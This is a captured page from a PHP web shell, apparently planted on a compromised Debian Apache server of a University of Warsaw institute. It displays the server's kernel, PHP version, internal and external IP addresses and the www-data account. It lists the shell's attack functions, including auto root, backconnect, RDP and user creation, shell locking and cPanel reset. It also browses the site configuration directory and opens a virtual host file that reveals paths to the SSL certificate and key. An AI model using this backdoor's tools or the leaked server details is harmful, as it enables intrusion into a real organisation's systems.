Linux polon 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64
Apache/2.4.59 (Debian)
: 10.2.73.233 | : 3.145.72.55
Cant Read [ /etc/named.conf ]
5.6.40-64+0~20230107.71+debian10~1.gbp673146
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
etc /
apache2 /
sites-enabled /
[ HOME SHELL ]
Name
Size
Permission
Action
000-default.conf
1.41
KB
-rw-r--r--
dialektologia.conf
1.91
KB
-rw-r--r--
ifk.conf
1.97
KB
-rw-r--r--
ifkpliki.conf
1.98
KB
-rw-r--r--
ilpnowa-ssl.conf
1.44
KB
-rw-r--r--
ilpnowa.conf
1.82
KB
-rw-r--r--
leksykografia.conf
1.66
KB
-rw-r--r--
mapaliteratury.conf
1.58
KB
-rw-r--r--
polon200.conf
1.6
KB
-rw-r--r--
slownik.conf
1.65
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : ilpnowa-ssl.conf
<IfModule mod_ssl.c> <VirtualHost _default_:443> ServerName ilp.uw.edu.pl ServerAdmin webmaster@localhost DocumentRoot /home/ilpnowa/web ServerAlias www.ilp.uw.edu.pl <FilesMatch \.php$> # Apache 2.4.10+ can proxy to unix socket SetHandler "proxy:unix:/var/run/php/php7.4-fpm.sock|fcgi://localhost/" </FilesMatch> <Directory /home/ilpnowa/web/> Options Indexes FollowSymLinks AllowOverride All #AllowOverride None Require all granted <IfModule mod_php5.c> php_value upload_max_filesize 32M php_value post_max_size 32M php_value memory_limit 256M # php_value output_buffering 4096 </IFModule> </Directory> # Available loglevels: trace8, ..., trace1, debug, info, notice, warn, # error, crit, alert, emerg. # It is also possible to configure the loglevel for particular # modules, e.g. #LogLevel info ssl:warn ErrorLog ${APACHE_LOG_DIR}/error.log CustomLog ${APACHE_LOG_DIR}/access.log combined # Enable/Disable SSL for this virtual host. SSLEngine on SSLCertificateFile /etc/apache2/ssl/ilp_uw_edu_pl_cert.cer SSLCertificateKeyFile /etc/apache2/ssl/ilp_uw_edu_pl_2024.key SSLCertificateChainFile /etc/apache2/ssl/ilp_uw_edu_pl_interm.cer <FilesMatch "\.(cgi|shtml|phtml|php)$"> SSLOptions +StdEnvVars </FilesMatch> <Directory /usr/lib/cgi-bin> SSLOptions +StdEnvVars </Directory> </VirtualHost> </IfModule> # vim: syntax=apache ts=4 sw=4 sts=4 sr noet
Close